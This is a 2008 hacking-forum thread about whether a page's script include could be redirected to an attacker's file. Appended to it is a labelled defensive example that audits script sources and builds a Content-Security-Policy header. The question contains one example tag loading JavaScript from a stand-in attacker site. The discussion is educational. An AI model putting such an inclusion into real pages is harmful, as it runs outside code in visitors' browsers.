Thursday, May 24, 2012
Javascript XSS vulnerability?

leoneo11
Posted on 12-09-08 22:48
Just a thought I had. I'm not too good with Javascript or Javascript vulnerabilities, but I know the basics pretty well. Anyway, theoretically, let's say there is a web page that executes a script when the web page loads, in a separate directory on the server. So the HTML code would look like this:

<script src="file:///C:/Javascripts/Myscript.js"></script>


To me... this just seems very vulnerable to an XSS attack if you can change the src, for example:

<script src="http://www.attacksite.com/attack.js"></script>


But to my knowledge the Javascript is hard coded into the HTML and cannot be changed. Any ideas if you can actually change the path to the script, or am I safe?



RE: Javascript XSS vulnerability?

spyware
Posted on 12-09-08 22:49
You can't change the hard-coded (no variable) settings. Oh, and you're not safe.

Edit: Actually, you can change hard-coded settings if you can regex+replace with some XSS.

Anyway, stop asking and start learning. I advise ha.ckers.org and sla.ckers.org if you want to learn about XSS, and Webappsec in general.




"The chowner of property." - Zeph
“Widespread intellectual and moral docility may be convenient for leaders in the short term,
but it is suicidal for nations in the long term.”
- Carl Sagan
“Since the grid is inescapable, what were the earlier lasers about? Does the corridor have a sense of humor?” - Ebert


Edited by spyware on 12-09-08 23:25
http://bitsofspy.net

RE: Javascript XSS vulnerability?

Zephyr_Pure
Posted on 13-09-08 00:53
leoneo11 wrote:
But to my knowledge the Javascript is hard coded into the HTML and cannot be changed. Any ideas if you can actually change the path to the script, or am I safe?


Both the Javascript and the Javascript include can be changed if you're rendering the page in something that lets you modify the source in place (PHP cURL, C# w/ MSHTML, even Opera should). I used to do this with MSHTML and my last workplace's CMS to automate the page while eliminating those pesky JS pop-ups. HTML and Javascript are both client-side once they're rendered... which is why GreaseMonkey even works.


I still check PMs from time to time.




Our responses were moronic, why shouldn't he follow suit? - Futility

RE: Javascript XSS vulnerability?

Uber0n
Posted on 13-09-08 08:30
leoneo11 wrote:
Anyway, theoretically, let's say there is a web page that executes a script when the web page loads, in a separate directory on the server. So the HTML code would look like this:

<script src="file:///C:/Javascripts/Myscript.js"></script>

I'd say this wouldn't work, since the Javascript is executed on the client's computer and not on the server. It'd rather look like this:
<script src="Javascripts/Myscript.js"></script>


To me... this just seems very vulnerable to an XSS attack if you can change the src, for example:

<script src="http://www.attacksite.com/attack.js"></script>

I understand what you mean, but you can't simply edit a hard coded HTML file just like that. Like spyware said, practical experience is very good. Get training ;)

http://www.xssed.com/



http://uber0n.webs.com/
Nope http://uber0n.webs.com/
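Added example, not part of any post in this thread: a small JavaScript audit that resolves each script src the way a browser would and flags the ones that do not stay on the page's own origin, using the three src values discussed above. The page URL https://example.test/app/index.html, the sample markup and the function names are constructed for illustration.

```javascript
// Added example (not from the thread). PAGE_URL and SAMPLE_HTML are constructed;
// the three src values are the ones quoted in the posts above.
const PAGE_URL = "https://example.test/app/index.html";
const SAMPLE_HTML = `
<script src="Javascripts/Myscript.js"></script>
<script src="file:///C:/Javascripts/Myscript.js"></script>
<script src="http://www.attacksite.com/attack.js"></script>
<script>var inline = 1;</script>`;

// Pull every src attribute out of <script> tags (quoted or unquoted values).
// A regex is enough for an audit sketch; a real scanner should use an HTML parser.
function extractScriptSrcs(html) {
  const re = /<script\b[^>]*?\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;
  const out = [];
  let m;
  while ((m = re.exec(html)) !== null) out.push(m[1] ?? m[2] ?? m[3]);
  return out;
}

// Resolve each src relative to the page URL, as the browser does, and classify
// it against the page's own origin plus an explicit allowlist of extra origins.
function auditScriptSources(html, pageUrl, allowedOrigins = []) {
  const page = new URL(pageUrl);
  const allowed = new Set([page.origin, ...allowedOrigins]);
  return extractScriptSrcs(html).map((src) => {
    let url;
    try {
      url = new URL(src, page);
    } catch {
      return { src, verdict: "unparseable" };
    }
    // file: and similar schemes point at the visitor's machine, not the server.
    if (url.protocol !== "http:" && url.protocol !== "https:")
      return { src, resolved: url.href, verdict: "non-web-scheme" };
    if (!allowed.has(url.origin))
      return { src, resolved: url.href, verdict: "foreign-origin" };
    return { src, resolved: url.href, verdict: "ok" };
  });
}

// Content-Security-Policy value that makes the browser enforce the same
// allowlist, so a script src rewritten to another origin is refused.
// Note: script-src without 'unsafe-inline' also blocks inline <script> blocks.
function buildCsp(allowedOrigins = []) {
  return ["script-src 'self'", ...allowedOrigins].join(" ");
}

for (const row of auditScriptSources(SAMPLE_HTML, PAGE_URL)) console.log(row);
console.log("Content-Security-Policy:", buildCsp());
```

The audit only reports what the served markup references; the header from buildCsp is what stops the browser from loading a script from an origin that is not on the list.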
© HellBound Hackers 2008- 2009. Since 3rd December 2004.